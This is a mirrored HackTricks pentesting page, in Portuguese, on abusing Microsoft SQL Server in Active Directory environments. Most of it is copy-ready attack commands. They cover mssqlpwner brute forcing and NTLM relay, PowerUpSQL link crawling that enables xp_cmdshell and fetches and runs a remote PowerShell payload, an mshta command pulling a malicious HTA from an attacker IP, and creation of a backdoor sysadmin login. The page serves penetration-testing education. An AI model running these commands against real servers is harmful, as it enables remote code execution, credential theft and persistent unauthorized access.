mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-25 04:23:33 +00:00
277 lines
14 KiB
Markdown
277 lines
14 KiB
Markdown
|
# MSSQL AD Abuse
|
|||
|
|
|||
|
{% hint style="success" %}
|
|||
|
Aprenda e pratique Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
|||
|
Aprenda e pratique Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
|||
|
|
|||
|
<details>
|
|||
|
|
|||
|
<summary>Support HackTricks</summary>
|
|||
|
|
|||
|
* Confira os [**planos de assinatura**](https://github.com/sponsors/carlospolop)!
|
|||
|
* **Junte-se ao** 💬 [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga**-nos no **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
|||
|
* **Compartilhe truques de hacking enviando PRs para o** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
|
|||
|
|
|||
|
</details>
|
|||
|
{% endhint %}
|
|||
|
|
|||
|
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
|
|||
|
|
|||
|
{% embed url="https://websec.nl/" %}
|
|||
|
|
|||
|
## **MSSQL Enumeração / Descoberta**
|
|||
|
|
|||
|
### Python
|
|||
|
A ferramenta [MSSQLPwner](https://github.com/ScorpionesLabs/MSSqlPwner) é baseada em impacket e também permite autenticar usando tickets kerberos e atacar através de cadeias de links.
|
|||
|
|
|||
|
<figure><img src="https://raw.githubusercontent.com/ScorpionesLabs/MSSqlPwner/main/assets/interractive.png"></figure>
|
|||
|
```shell
|
|||
|
# Interactive mode
|
|||
|
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth interactive
|
|||
|
|
|||
|
# Interactive mode with 2 depth level of impersonations
|
|||
|
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -max-impersonation-depth 2 interactive
|
|||
|
|
|||
|
|
|||
|
# Executing custom assembly on the current server with windows authentication and executing hostname command
|
|||
|
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth custom-asm hostname
|
|||
|
|
|||
|
# Executing custom assembly on the current server with windows authentication and executing hostname command on the SRV01 linked server
|
|||
|
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 custom-asm hostname
|
|||
|
|
|||
|
# Executing the hostname command using stored procedures on the linked SRV01 server
|
|||
|
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec hostname
|
|||
|
|
|||
|
# Executing the hostname command using stored procedures on the linked SRV01 server with sp_oacreate method
|
|||
|
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec "cmd /c mshta http://192.168.45.250/malicious.hta" -command-execution-method sp_oacreate
|
|||
|
|
|||
|
# Issuing NTLM relay attack on the SRV01 server
|
|||
|
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 ntlm-relay 192.168.45.250
|
|||
|
|
|||
|
# Issuing NTLM relay attack on chain ID 2e9a3696-d8c2-4edd-9bcc-2908414eeb25
|
|||
|
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -chain-id 2e9a3696-d8c2-4edd-9bcc-2908414eeb25 ntlm-relay 192.168.45.250
|
|||
|
|
|||
|
# Issuing NTLM relay attack on the local server with custom command
|
|||
|
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth ntlm-relay 192.168.45.250
|
|||
|
|
|||
|
# Executing direct query
|
|||
|
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth direct-query "SELECT CURRENT_USER"
|
|||
|
|
|||
|
# Retrieving password from the linked server DC01
|
|||
|
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-server DC01 retrive-password
|
|||
|
|
|||
|
# Execute code using custom assembly on the linked server DC01
|
|||
|
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-server DC01 inject-custom-asm SqlInject.dll
|
|||
|
|
|||
|
# Bruteforce using tickets, hashes, and passwords against the hosts listed on the hosts.txt
|
|||
|
mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt -hl hashes.txt -pl passwords.txt
|
|||
|
|
|||
|
# Bruteforce using hashes, and passwords against the hosts listed on the hosts.txt
|
|||
|
mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt -pl passwords.txt
|
|||
|
|
|||
|
# Bruteforce using tickets against the hosts listed on the hosts.txt
|
|||
|
mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt
|
|||
|
|
|||
|
# Bruteforce using passwords against the hosts listed on the hosts.txt
|
|||
|
mssqlpwner hosts.txt brute -ul users.txt -pl passwords.txt
|
|||
|
|
|||
|
# Bruteforce using hashes against the hosts listed on the hosts.txt
|
|||
|
mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt
|
|||
|
|
|||
|
```
|
|||
|
### Enumerando a partir da rede sem sessão de domínio
|
|||
|
```
|
|||
|
# Interactive mode
|
|||
|
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth interactive
|
|||
|
```
|
|||
|
---
|
|||
|
### Powershell
|
|||
|
|
|||
|
O módulo powershell [PowerUpSQL](https://github.com/NetSPI/PowerUpSQL) é muito útil neste caso.
|
|||
|
```powershell
|
|||
|
Import-Module .\PowerupSQL.psd1
|
|||
|
```
|
|||
|
### Enumerando a partir da rede sem sessão de domínio
|
|||
|
```powershell
|
|||
|
# Get local MSSQL instance (if any)
|
|||
|
Get-SQLInstanceLocal
|
|||
|
Get-SQLInstanceLocal | Get-SQLServerInfo
|
|||
|
|
|||
|
#If you don't have a AD account, you can try to find MSSQL scanning via UDP
|
|||
|
#First, you will need a list of hosts to scan
|
|||
|
Get-Content c:\temp\computers.txt | Get-SQLInstanceScanUDP –Verbose –Threads 10
|
|||
|
|
|||
|
#If you have some valid credentials and you have discovered valid MSSQL hosts you can try to login into them
|
|||
|
#The discovered MSSQL servers must be on the file: C:\temp\instances.txt
|
|||
|
Get-SQLInstanceFile -FilePath C:\temp\instances.txt | Get-SQLConnectionTest -Verbose -Username test -Password test
|
|||
|
```
|
|||
|
### Enumerando de dentro do domínio
|
|||
|
```powershell
|
|||
|
# Get local MSSQL instance (if any)
|
|||
|
Get-SQLInstanceLocal
|
|||
|
Get-SQLInstanceLocal | Get-SQLServerInfo
|
|||
|
|
|||
|
#Get info about valid MSQL instances running in domain
|
|||
|
#This looks for SPNs that starts with MSSQL (not always is a MSSQL running instance)
|
|||
|
Get-SQLInstanceDomain | Get-SQLServerinfo -Verbose
|
|||
|
|
|||
|
#Test connections with each one
|
|||
|
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -verbose
|
|||
|
|
|||
|
#Try to connect and obtain info from each MSSQL server (also useful to check conectivity)
|
|||
|
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
|
|||
|
|
|||
|
# Get DBs, test connections and get info in oneliner
|
|||
|
Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLServerInfo
|
|||
|
```
|
|||
|
## Abuso Básico do MSSQL
|
|||
|
|
|||
|
### Acessar DB
|
|||
|
```powershell
|
|||
|
#Perform a SQL query
|
|||
|
Get-SQLQuery -Instance "sql.domain.io,1433" -Query "select @@servername"
|
|||
|
|
|||
|
#Dump an instance (a lotof CVSs generated in current dir)
|
|||
|
Invoke-SQLDumpInfo -Verbose -Instance "dcorp-mssql"
|
|||
|
|
|||
|
# Search keywords in columns trying to access the MSSQL DBs
|
|||
|
## This won't use trusted SQL links
|
|||
|
Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLColumnSampleDataThreaded -Keywords "password" -SampleSize 5 | select instance, database, column, sample | ft -autosize
|
|||
|
```
|
|||
|
### MSSQL RCE
|
|||
|
|
|||
|
Pode também ser possível **executar comandos** dentro do host MSSQL
|
|||
|
```powershell
|
|||
|
Invoke-SQLOSCmd -Instance "srv.sub.domain.local,1433" -Command "whoami" -RawResults
|
|||
|
# Invoke-SQLOSCmd automatically checks if xp_cmdshell is enable and enables it if necessary
|
|||
|
```
|
|||
|
Verifique na página mencionada na **seção seguinte como fazer isso manualmente.**
|
|||
|
|
|||
|
### Truques Básicos de Hacking MSSQL
|
|||
|
|
|||
|
{% content-ref url="../../network-services-pentesting/pentesting-mssql-microsoft-sql-server/" %}
|
|||
|
[pentesting-mssql-microsoft-sql-server](../../network-services-pentesting/pentesting-mssql-microsoft-sql-server/)
|
|||
|
{% endcontent-ref %}
|
|||
|
|
|||
|
## Links Confiáveis MSSQL
|
|||
|
|
|||
|
Se uma instância MSSQL é confiável (link de banco de dados) por uma instância MSSQL diferente. Se o usuário tiver privilégios sobre o banco de dados confiável, ele poderá **usar o relacionamento de confiança para executar consultas também na outra instância**. Essas confianças podem ser encadeadas e, em algum momento, o usuário pode ser capaz de encontrar algum banco de dados mal configurado onde pode executar comandos.
|
|||
|
|
|||
|
**Os links entre bancos de dados funcionam mesmo através de confianças de floresta.**
|
|||
|
|
|||
|
### Abuso do Powershell
|
|||
|
```powershell
|
|||
|
#Look for MSSQL links of an accessible instance
|
|||
|
Get-SQLServerLink -Instance dcorp-mssql -Verbose #Check for DatabaseLinkd > 0
|
|||
|
|
|||
|
#Crawl trusted links, starting from the given one (the user being used by the MSSQL instance is also specified)
|
|||
|
Get-SQLServerLinkCrawl -Instance mssql-srv.domain.local -Verbose
|
|||
|
|
|||
|
#If you are sysadmin in some trusted link you can enable xp_cmdshell with:
|
|||
|
Get-SQLServerLinkCrawl -instance "<INSTANCE1>" -verbose -Query 'EXECUTE(''sp_configure ''''xp_cmdshell'''',1;reconfigure;'') AT "<INSTANCE2>"'
|
|||
|
|
|||
|
#Execute a query in all linked instances (try to execute commands), output should be in CustomQuery field
|
|||
|
Get-SQLServerLinkCrawl -Instance mssql-srv.domain.local -Query "exec master..xp_cmdshell 'whoami'"
|
|||
|
|
|||
|
#Obtain a shell
|
|||
|
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query 'exec master..xp_cmdshell "powershell iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1'')"'
|
|||
|
|
|||
|
#Check for possible vulnerabilities on an instance where you have access
|
|||
|
Invoke-SQLAudit -Verbose -Instance "dcorp-mssql.dollarcorp.moneycorp.local"
|
|||
|
|
|||
|
#Try to escalate privileges on an instance
|
|||
|
Invoke-SQLEscalatePriv –Verbose –Instance "SQLServer1\Instance1"
|
|||
|
|
|||
|
#Manual trusted link queery
|
|||
|
Get-SQLQuery -Instance "sql.domain.io,1433" -Query "select * from openquery(""sql2.domain.io"", 'select * from information_schema.tables')"
|
|||
|
## Enable xp_cmdshell and check it
|
|||
|
Get-SQLQuery -Instance "sql.domain.io,1433" -Query 'SELECT * FROM OPENQUERY("sql2.domain.io", ''SELECT * FROM sys.configurations WHERE name = ''''xp_cmdshell'''''');'
|
|||
|
Get-SQLQuery -Instance "sql.domain.io,1433" -Query 'EXEC(''sp_configure ''''show advanced options'''', 1; reconfigure;'') AT [sql.rto.external]'
|
|||
|
Get-SQLQuery -Instance "sql.domain.io,1433" -Query 'EXEC(''sp_configure ''''xp_cmdshell'''', 1; reconfigure;'') AT [sql.rto.external]'
|
|||
|
## If you see the results of @@selectname, it worked
|
|||
|
Get-SQLQuery -Instance "sql.rto.local,1433" -Query 'SELECT * FROM OPENQUERY("sql.rto.external", ''select @@servername; exec xp_cmdshell ''''powershell whoami'''''');'
|
|||
|
```
|
|||
|
### Metasploit
|
|||
|
|
|||
|
Você pode facilmente verificar links confiáveis usando metasploit.
|
|||
|
```bash
|
|||
|
#Set username, password, windows auth (if using AD), IP...
|
|||
|
msf> use exploit/windows/mssql/mssql_linkcrawler
|
|||
|
[msf> set DEPLOY true] #Set DEPLOY to true if you want to abuse the privileges to obtain a meterpreter session
|
|||
|
```
|
|||
|
Note que o metasploit tentará abusar apenas da função `openquery()` no MSSQL (então, se você não conseguir executar comandos com `openquery()`, precisará tentar o método `EXECUTE` **manualmente** para executar comandos, veja mais abaixo.)
|
|||
|
|
|||
|
### Manual - Openquery()
|
|||
|
|
|||
|
A partir do **Linux**, você pode obter um shell de console MSSQL com **sqsh** e **mssqlclient.py.**
|
|||
|
|
|||
|
A partir do **Windows**, você também pode encontrar os links e executar comandos manualmente usando um **cliente MSSQL como** [**HeidiSQL**](https://www.heidisql.com)
|
|||
|
|
|||
|
_Login usando autenticação do Windows:_
|
|||
|
|
|||
|
![](<../../.gitbook/assets/image (808).png>)
|
|||
|
|
|||
|
#### Encontrar Links Confiáveis
|
|||
|
```sql
|
|||
|
select * from master..sysservers;
|
|||
|
EXEC sp_linkedservers;
|
|||
|
```
|
|||
|
![](<../../.gitbook/assets/image (716).png>)
|
|||
|
|
|||
|
#### Execute queries in trustable link
|
|||
|
|
|||
|
Execute consultas através do link (exemplo: encontre mais links na nova instância acessível):
|
|||
|
```sql
|
|||
|
select * from openquery("dcorp-sql1", 'select * from master..sysservers')
|
|||
|
```
|
|||
|
{% hint style="warning" %}
|
|||
|
Verifique onde aspas duplas e simples são usadas, é importante usá-las dessa forma.
|
|||
|
{% endhint %}
|
|||
|
|
|||
|
![](<../../.gitbook/assets/image (643).png>)
|
|||
|
|
|||
|
Você pode continuar essa cadeia de links confiáveis para sempre manualmente.
|
|||
|
```sql
|
|||
|
# First level RCE
|
|||
|
SELECT * FROM OPENQUERY("<computer>", 'select @@servername; exec xp_cmdshell ''powershell -w hidden -enc blah''')
|
|||
|
|
|||
|
# Second level RCE
|
|||
|
SELECT * FROM OPENQUERY("<computer1>", 'select * from openquery("<computer2>", ''select @@servername; exec xp_cmdshell ''''powershell -enc blah'''''')')
|
|||
|
```
|
|||
|
Se você não consegue realizar ações como `exec xp_cmdshell` a partir de `openquery()`, tente com o método `EXECUTE`.
|
|||
|
|
|||
|
### Manual - EXECUTE
|
|||
|
|
|||
|
Você também pode abusar de links confiáveis usando `EXECUTE`:
|
|||
|
```bash
|
|||
|
#Create user and give admin privileges
|
|||
|
EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
|
|||
|
EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
|
|||
|
```
|
|||
|
## Escalação de Privilégios Local
|
|||
|
|
|||
|
O **usuário local do MSSQL** geralmente possui um tipo especial de privilégio chamado **`SeImpersonatePrivilege`**. Isso permite que a conta "imite um cliente após a autenticação".
|
|||
|
|
|||
|
Uma estratégia que muitos autores desenvolveram é forçar um serviço do SYSTEM a se autenticar em um serviço malicioso ou man-in-the-middle que o atacante cria. Esse serviço malicioso pode então imitar o serviço do SYSTEM enquanto tenta se autenticar.
|
|||
|
|
|||
|
[SweetPotato](https://github.com/CCob/SweetPotato) possui uma coleção dessas várias técnicas que podem ser executadas através do comando `execute-assembly` do Beacon.
|
|||
|
|
|||
|
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
|
|||
|
|
|||
|
{% embed url="https://websec.nl/" %}
|
|||
|
|
|||
|
{% hint style="success" %}
|
|||
|
Aprenda e pratique Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
|||
|
Aprenda e pratique Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
|||
|
|
|||
|
<details>
|
|||
|
|
|||
|
<summary>Support HackTricks</summary>
|
|||
|
|
|||
|
* Confira os [**planos de assinatura**](https://github.com/sponsors/carlospolop)!
|
|||
|
* **Junte-se ao** 💬 [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga**-nos no **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
|||
|
* **Compartilhe truques de hacking enviando PRs para os repositórios do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
|||
|
|
|||
|
</details>
|
|||
|
{% endhint %}
|